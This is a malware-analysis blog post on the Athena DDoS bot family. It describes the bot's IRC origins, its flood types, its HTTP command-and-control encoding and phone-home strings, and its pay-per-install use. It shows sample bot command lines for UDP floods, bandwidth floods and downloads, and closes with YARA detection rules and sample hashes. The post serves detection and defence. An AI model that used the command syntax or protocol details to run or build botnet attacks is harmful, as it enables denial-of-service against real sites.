Athena, A DDoS Malware Odyssey

By: Jason Jones -

The Athena malware family  has existed for quite some time and appears to have a love/hate relationship based on posts in various “underground” forums . The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post will discuss it’s origins, DDoS capabilities, and go over it’s latest evolution and offer some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and then subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware and not so much for DDoS. The majority of CnC would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also used a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
AthenaIRC 2.3.1 Manual Cover

AthenaIRC 2.3.1 Manual Cover

Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner“. In the 1.X days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet building escapades without having to purchase. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) being  superior.

The 2.X versions saw this distribution model change and _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and proliferation of various versions that we have seen come through our zoo business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into their IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant amount of commands added: more DDoS commands, more password stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that  obfuscates the IP address  by adding or subtracting a static value from each octet of the IP depending on where it falls in the top or bottom half of the valid octet range. This feature was observed in our sandboxing system many times where a CnC hostname pointed to an IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.

The pricing structure for 2.3.1 is $100 for one build, $10 to rebuild or update, $15 to have _Stoner setup your IRC, and $130 for a ready-made IRC channel that is “capable of holding 20k bots” and one build.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like I was Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena IRC Command Parsing

Athena offers many DDoS attacks including standard HTTP GET/POST floods, UDP flood, RUDY, Slowloris, Slowpost, ARME, HTTP flood via hidden browser, bandwidth floods and an established connection flood attack.  The attacks perform as advertised, but, unlike other DDoS bots, only one attack at a time can be carried out. This severely limits its ability to compete in the underground DDoS-for-hire marketspace with other bots like Madness, Drive, and DirtJumper

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated and if they are above or below certain values then different values are selected for the header and in some cases the randomly generated value is used to determin whether or not to include a header at all. The image below illustrates the possible headers that are include and the potential values for those that are to be included. Green means the value is selected based on which attack is ordered, values in black are always included, headers in blue are randomly included and then the red values are the values that the final header value is selected from.

Athena HTTP Request Building

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. There are three parameters – a,b and c – that are sent with the POST request to the CnC. The a parameter is a fully URL encoded base64 string, that will provide a colon separated string translation table. The string translation table will be used on the b parameter which is another base64 string – this time not URL encoded – and then base64 decoded to yield the phone-home data of the bot, and c is used as a data marker on the response from the server. The initial phone home format format string is below, where gend is the “gender” (laptop,desktop,etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

and then subsequent phone-homes will use this format string. The bk_ signify “botkill” data, and busy signifies whether or not the bot is busy with a command.

  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

The server will use the string translation table sent by the bot on the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Without the original phone-home from the bot, this makes determining the commands sent by the cnc extremely difficult. The commands sent by the CnC are pipe-delimited with taskid=<task id> in the first part and then command=<command>  in the 2nd part.

The commands actually follow the exact same structure as the IRC version and the same parsing method is used once the command is extracted and some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels floating around on their CnCs which greatly sped up my reverse engineering of how the Athena HTTP binaries were operating. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation that I went through when recovering to readable PHP code:

The panel isn’t anything flashy, but is quite usable and shows the state of all bots and commands. I fired up an internal version of the control panel to experiment with and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This brings up the question of what is it used for? One of most popular uses that we have observed on the CnCs that we monitor is as a pay-per-install (PPI) botnet. Over the last 6 months, we have collected over 150 new executables by monitoring what URLs were told to be downloaded. A timeline graph is shown below, unlabeled yellow dots were samples that were  unidentified by our tagging system and also did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/LiteCoin/etc miners, while other were some password stealing applications. Apologies for the overlap on names, but it was extremely difficult to get them as non-overlapped as they are due to the high volume during a few short periods where people appeared to be testing out their new botnets :). The large gap in late August through early / October was due to a slight change in identification that caused our monitoring system to miss new samples and is not necessarily reflective of new malware not getting dropped.

Athena HTTP Dropped Malware Timeline

Athena HTTP Dropped Malware Timeline

 

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that look like  (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via mutex: search)  and additionally has many easily identifiable strings depending on the version. One such yara rule is presented below that catches many, but not all, versions of the IRC version and another rule that has so far detected all of the HTTP versions we have seen is also presented – these are also available in the Arbor Github repository. The Microsoft Security Essentials engine identifies the IRC and early versions of  Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.

 

rule athena_http{
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description= "Athena HTTP identification"
 strings:
   $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
 condition:
     all of ($fmt_str*) and 3 of ($cmd*)
}
rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}

Related MD5:

Athena IRC

3eb262817d8ab8a6f2282f0455c6ac03
859c2fec50ba1212dca9f00aa4a64ec4
0044e1e55b9524cc72b4060e5e84293d
cd962b1cfdfa6e3921adfc3750e95282
02214f425bf9c2c67d49e267bc4c84f6

Athena HTTP

2a8b26d216aea6fad8dd2297fd054413
e8bda57d4ca45cbe5d780a87e5052d0a
2d9f8082be96150b7f483ea5e863fcaa
7535a5ee124612cbaaf0e5a53b29158a
f1c083104fa4992e9f47a5b87e2c64f0

Comments are closed